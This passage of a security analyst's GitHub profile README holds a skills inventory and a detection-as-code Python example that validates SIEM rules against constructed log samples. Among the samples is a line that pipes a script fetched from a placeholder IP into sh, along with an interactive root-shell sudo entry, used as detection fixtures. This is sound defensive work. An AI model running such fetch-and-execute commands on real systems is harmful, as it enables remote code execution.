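             extra={"fields": {"src_ip": alert["src_ip"], "ti_hits": 1}})
    verdict = "escalate" if alert["level"] >= 10 else "close"
    log.info("triage verdict", extra={"fields": {"verdict": verdict}})

    return [json.loads(line) for line in buf.getvalue().splitlines()]


if __name__ == "__main__":
    # Constructed sample alert; field names are assumptions, not a Wazuh schema.
    sample = {"id": "alert-0001", "rule_id": 5710, "src_ip": "203.0.113.5", "level": 12}
    for ev in triage_alert(sample):
        print(ev)
```

Every line is a self-contained JSON object, so a log pipeline can index `correlation_id` directly and a `grep`/`jq` over the raw file still recovers one job's full trail.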

🤖 AI Automation, Workflow Design & Prompting Stack

🧠 AI Automation & Agentic Workflows

  • n8n — workflow orchestration, node chaining, Slack/TheHive routing, DataTable state, and automation prototypes
  • Gemini API — AI-assisted SOC triage and RAG application workflows
  • AI Agents — task-driven automation experiments and tool-use workflows
  • Hugging Face — agents, LLM fundamentals, MCP learning, Spaces, and model ecosystem practice
  • smolagents / LlamaIndex / LangGraph — agent and RAG-oriented learning exposure
  • FastMCP / MCP servers — MCP workflow servers, tools, resources, and automation integrations
  • GitHub Actions + Slack automation — production-inspired MCP notification and workflow automation practice
  • RAG Basics — retrieval-augmented generation exposure
  • Vector Workflow Basics — vector-based retrieval understanding

✍️ Prompting & Context Engineering

  • Prompt Engineering — structuring effective instructions
  • Context Design — grounding and response quality improvement
  • Workflow Prompt Chaining — passing instructions across nodes and tasks
  • Human-in-the-Loop Design — keeping analyst review, approval, and decision quality in automation workflows
  • LLM-Assisted Automation Thinking — using AI to reduce repetitive operational work responsibly

🧬 AI Security & GenAI Detection

  • Detection-as-Code — detection content validation, deployment gating, and regression thinking
  • OWASP LLM / GenAI risk mapping — prompt injection, output handling, sensitive disclosure, and excessive agency thinking
  • MCP/RAG/Agentic AI security — MCP tool misuse, context injection, memory poisoning, retrieval risk, and agentic action monitoring
  • TheHive + Slack + DataTables — analyst-facing case, notification, and audit evidence handling for AI security alerts
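
The "Detection-as-Code" bullet above (validation, deployment gating, regression thinking) is easiest to see with rules kept as data and tested like code. The block below is an added example written for this page, not the author's detection content or Wazuh rules: each rule carries a regex, an ATT&CK technique ID and the constructed log lines it must match, and a gate refuses the rule set if any rule has an invalid regex, a malformed technique ID, a duplicate ID, a regression (an expected sample it no longer matches) or a false positive on a constructed benign corpus. Rule IDs, log lines and hostnames are all constructed.

```python
"""Detection-as-code: rules as data, validated against sample logs before deployment."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    id: str
    name: str
    pattern: str        # regex applied to one raw log line
    technique: str      # MITRE ATT&CK technique ID, e.g. T1110 or T1548.003
    positives: tuple    # constructed log lines the rule MUST match (regression set)
    level: int = 10


# Constructed rule set; IDs and samples are illustrative, not real Wazuh content.
RULES = [
    Rule("100010", "ssh-failed-password",
         r"sshd\[\d+\]: Failed password for (invalid user )?\S+ from \S+", "T1110",
         positives=("Mar  3 10:00:01 host sshd[2231]: Failed password for invalid user admin "
                    "from 198.51.100.7 port 5123 ssh2",)),
    Rule("100011", "sudo-to-root-shell",
         r"sudo: +\S+ : .*COMMAND=/(usr/)?bin/(ba)?sh\b", "T1548.003",
         positives=("Mar  3 10:01:00 host sudo:   www-data : TTY=unknown ; PWD=/var/www ; "
                    "USER=root ; COMMAND=/bin/bash -i",)),
    Rule("100012", "curl-pipe-shell",
         r"curl .*\| *(ba)?sh\b", "T1059.004",
         positives=("Mar  3 10:02:10 host bash[3102]: curl -fsSL http://203.0.113.9/x.sh | sh",)),
]

# Constructed benign activity: a rule that fires on any of these is too broad to ship.
BENIGN = (
    "Mar  3 10:00:05 host sshd[2240]: Accepted publickey for deploy from 10.0.0.5 port 50022 ssh2",
    "Mar  3 10:00:09 host sudo:   deploy : TTY=pts/0 ; PWD=/srv ; USER=root ; "
    "COMMAND=/usr/bin/systemctl restart wazuh-agent",
    "Mar  3 10:00:12 host bash[3001]: curl -sS https://updates.example.com/manifest.json -o /tmp/manifest.json",
)

TECHNIQUE_RE = re.compile(r"^T\d{4}(\.\d{3})?$")


def match(rule: Rule, line: str) -> bool:
    return re.search(rule.pattern, line) is not None


def validate(rules: list, benign: tuple) -> list:
    """Deployment gate. Returns human-readable failures; an empty list means ship it."""
    failures = []
    ids = [r.id for r in rules]
    if len(ids) != len(set(ids)):
        failures.append("duplicate rule ids")
    for r in rules:
        try:
            re.compile(r.pattern)
        except re.error as exc:
            failures.append(f"{r.id}: invalid regex ({exc})")
            continue
        if not TECHNIQUE_RE.match(r.technique):
            failures.append(f"{r.id}: malformed ATT&CK technique id {r.technique!r}")
        missed = [p for p in r.positives if not match(r, p)]
        if missed:
            failures.append(f"{r.id}: regression, {len(missed)} expected sample(s) no longer match")
        fps = [b for b in benign if match(r, b)]
        if fps:
            failures.append(f"{r.id}: false positive on benign sample {fps[0]!r}")
    return failures


def run_rules(rules: list, lines) -> dict:
    """Apply every rule to every line; returns {rule_id: [matching lines]}."""
    hits = {r.id: [] for r in rules}
    for line in lines:
        for r in rules:
            if match(r, line):
                hits[r.id].append(line)
    return hits


if __name__ == "__main__":
    problems = validate(RULES, BENIGN)
    print("gate:", "PASS" if not problems else "FAIL")
    for p in problems:
        print(" -", p)
```

In CI the gate runs on every pull request that touches rule content; a too-broad rule such as one matching any `sudo:` line is rejected by the false-positive check before it ever reaches the SIEM, and editing a pattern that breaks an earlier true positive is caught as a regression.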

📊 Data Science, Analytics & AI Toolkit

🧪 Data Analysis & Exploration

  • Jupyter Notebook / Google Colab — interactive coding and lab documentation
  • Pandas — cleaning, filtering, and analysis
  • NumPy — numerical workflows
  • Regex / JSON / CSV workflows — practical extraction and data handling
  • Exploratory Data Analysis — dataset understanding and pattern discovery

📈 Visualization & Storytelling

  • Matplotlib — static charting
  • Seaborn — statistical visualization
  • Plotly / Bokeh / Dash / Streamlit — interactive visualization, dashboards, and app-style reporting
  • Folium / GeoJSON — geospatial visualization exposure
  • Notebook Reporting — documenting technical insights clearly

📊 Statistics & ML Foundations

  • Descriptive Statistics — summarization and variability analysis
  • Probability Concepts — statistical reasoning
  • A/B Testing & Hypothesis Testing — experiment-style analysis
  • scikit-learn — ML foundations
  • Feature Engineering — preprocessing and transformation
  • Model Evaluation — comparing outputs and improving quality

🧠 Advanced Learning Foundations

  • NLP Concepts — text processing and language-oriented workflows
  • Time Series Concepts — trend and forecasting exposure
  • TensorFlow / Keras / PyTorch — deep learning foundations
  • CNN / RNN / Transformer Foundations — computer vision and sequence-model learning exposure
  • Analytical Thinking for Security — data-backed reasoning for security-adjacent workflows

🎯 Interests & Hobbies

🏀 Outdoor & Fitness

  • 🏀 Basketball — agility, movement & teamwork
  • 🏋️ Gym — discipline, consistency & self-improvement
  • 🏊 Swimming — endurance & focus
  • 🐎 Horse Riding — balance, control & confidence

🎮 Gaming (PC)

  • 🚗 GTA V — strategy & exploration
  • FIFA — coordination & competitive gameplay


🧠 Professional Interests

  • 🛡 SOC Operations & Detection Engineering
  • ☁️ AWS Security & IAM Automation
  • 🤖 AI Security Automation & SOAR Workflows
  • 🧬 GenAI Security, MCP/RAG & Detection-as-Code

📚 Continuous Learning

  • 📘 Hands-on labs & portfolio building
  • 🧪 Real-world security simulations
  • 🧠 Skill growth across SOC, cloud, AI, DevSecOps & automation
  • 📈 Analytics-driven technical improvement


🌍 Languages

  • Urdu / Hindi
  • Arabic
  • English


🤝✨ Let’s Connect, Collaborate & Build Secure Systems ✨🤝


💼 Professional Services

  • 🔍 SOC Monitoring & Alert Triage — Alert review, triage support, escalation notes, and analyst-style reporting.
  • 📊 Wazuh SIEM & Detection Support — Log visibility, rule/decoder support, dashboard checks, and detection workflow improvement.
  • 🧠 Threat Intelligence & IOC Enrichment — IOC review, enrichment, ATT&CK mapping, and investigation context building.
  • 📝 Incident Response Documentation — Case notes, timelines, containment tracking, lessons learned, and response reporting.
  • 🐧 Linux Security Hardening — SSH hardening, firewall setup, permissions, audit visibility, and service security checks.
  • 🌐 Web & Network Security Visibility — Web logs, WAF visibility, traffic review, Nmap/Wireshark analysis, and monitoring support.
  • 🧪 Vulnerability Review & Validation — Finding review, prioritization, hardening recommendations, and remediation documentation.
  • 🤖 AI Security Automation & n8n Workflows — Alert-to-case automation, AI-assisted triage, Slack/TheHive routing, and workflow prototyping.
  • ⚙️ Python / Bash / DevSecOps Automation — Helper scripts, log parsing, CLI tools, validation checks, and lightweight automation.
  • 📚 Technical Documentation & Portfolio Writing — GitHub READMEs, architecture writeups, project documentation, and technical presentation.

📧 Reach Out

🌟 If you find my work interesting, please consider:

  • Follow on GitHub
  • Follow on LinkedIn
  • Buy Me a Coffee


“In cybersecurity, continuous learning is not optional — it is survival.”
— Bruce Schneier

“A man who builds from scratch never fears loss, because what made him cannot be taken away: knowledge, experience, and resilience.”
— Mastering Manhood

Made with 💙 by Abdul Rehman

Last Updated: May 2026

Pinned

  1. SOC-SOAR-ECOSYSTEM-AWS (Public)

    42-project AWS SOC/SOAR portfolio with Wazuh, TheHive, Cortex, MISP, n8n, AWS security, Terraform, detection engineering, IR, dashboards, and GenAI/MCP/RAG/agentic AI security automation.

    Python · ★ 2

  2. Vulnerability-Assessment-in-line-with-Various-Frameworks (Public)

    60 hands-on vulnerability assessment labs aligned with security frameworks, covering scanning, validation, risk prioritization, configuration auditing, and reporting.

    Shell · ★ 3

  3. Data-Science-With-Python (Public)

    Hands-on Data Science with Python portfolio built through 57 Google Colab labs across 8 sections, progressing from Python foundations and data wrangling to visualization, ML, NLP, forecasting, and …

    Jupyter Notebook · ★ 2

  4. AI-Advanced-Course-Portfolio (Public)

    Documentation-first portfolio of my full AI Advanced Course journey, covering AI foundations, ML, DL, transformers, and deployable Streamlit + LangChain RAG projects.

    Jupyter Notebook · ★ 1

  5. Hugging-Face-AI-Learning-Portfolio (Public)

    A documentation-first portfolio of my completed Hugging Face learning journey across Agents, LLM, and MCP, featuring practical implementations, certificates, notes, and production-style AI automati…

    Python · ★ 1

  6. Incident-Response-and-Adversary-Emulation (Public)

    20 hands-on SOC and DFIR labs covering adversary emulation, detection engineering, forensics, case workflows, and end-to-end incident response execution.

    Shell · ★ 1